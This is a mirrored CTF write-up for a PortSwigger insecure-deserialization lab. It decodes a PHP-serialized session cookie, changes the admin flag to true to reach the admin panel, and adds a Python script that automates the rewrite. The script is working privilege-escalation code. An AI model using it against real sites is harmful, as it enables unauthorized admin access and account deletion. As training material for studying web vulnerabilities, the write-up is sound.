mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
Portswigger Insecure Deserialization - Lab 1
Modifying serialized objects
In this lab we need to modify the session cookie, which is built using serialization, to escalate our privileges to the administrator user and then delete the carlos user.
We can login with the credentials wiener:peter
After logging in we'll see the session token:
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d
which is base64 encoded (the trailing %3d is a URL-encoded =). We can decode it; I used CyberChef.
Now to understand the serialized cookie:
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
O:4:"User":2 represents an object (O) whose class name User is 4 characters long, and which has 2 attributes: username and admin.
s:8:"username" is a string of length 8 (the attribute name), which has the value s:6:"wiener", a string of length 6.
s:5:"admin" is a string of length 5 (the attribute name), which has a boolean value, represented by b, with the value 0, which is false.
So we need to make this value true by changing b:0 to b:1, base64-encode the modified string again and replace the session cookie with it.
After refreshing the page we'll see that we have access to the admin panel,
and we can delete the carlos user and complete the lab.
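As an added example (my own code, not part of the original write-up or the lab): a small Python parser and serializer for the flat PHP serialization format shown above. It decodes the cookie, checks that each declared string length matches the content, rebuilds the object with admin set to true and re-encodes it, which is exactly the modification the write-up makes by hand. The function names and the assumption that the cookie text is ASCII are mine; the cookie value is the one quoted above.

```python
import base64
import re
from urllib.parse import quote, unquote
# Session cookie quoted in the write-up: URL-encoded base64 of a PHP-serialized User object.
COOKIE = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d"

def decode_cookie(cookie):
    """URL-decode, then base64-decode, the cookie into its PHP-serialized text."""
    return base64.b64decode(unquote(cookie)).decode()

def _read_value(data, pos):
    """Read one scalar at data[pos]: s:<len>:"<text>"; b:<0|1>; or i:<n>; (ASCII assumed)."""
    if data[pos] == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2  # skip the ':"' that opens the quoted text
        if data[start + length:start + length + 2] != '";':
            raise ValueError("declared string length does not match content")
        return data[start:start + length], start + length + 2
    if data[pos] in ("b", "i"):
        end = data.index(";", pos)
        number = int(data[pos + 2:end])
        return (bool(number) if data[pos] == "b" else number), end + 1
    raise ValueError(f"unsupported PHP type tag {data[pos]!r}")

def parse_php_object(data):
    """Parse O:<len>:"<class>":<count>:{...} into (class name, members dict)."""
    head = re.match(r'O:(\d+):"([^"]*)":(\d+):\{', data)
    if not head or int(head.group(1)) != len(head.group(2)):
        raise ValueError("not a well-formed PHP-serialized object")
    cls, count, pos, members = head.group(2), int(head.group(3)), head.end(), {}
    for _ in range(count):
        key, pos = _read_value(data, pos)
        members[key], pos = _read_value(data, pos)
    return cls, members

def serialize_php_object(cls, members):
    """Re-emit the object; PHP string lengths are byte counts, so encode before measuring."""
    def enc(v):
        if isinstance(v, bool):
            return f"b:{int(v)};"
        return f"i:{v};" if isinstance(v, int) else f's:{len(v.encode())}:"{v}";'
    body = "".join(enc(k) + enc(v) for k, v in members.items())
    return f'O:{len(cls)}:"{cls}":{len(members)}:{{{body}}}'

def rewrite_cookie(cookie, **changes):
    """Decode, overwrite members (e.g. admin=True), re-serialize and re-encode the cookie."""
    cls, members = parse_php_object(decode_cookie(cookie))
    members.update(changes)
    return quote(base64.b64encode(serialize_php_object(cls, members).encode()).decode(), safe="")
```

Nothing in this format authenticates the data, which is why a server must sign or otherwise verify a serialized cookie before trusting fields like admin.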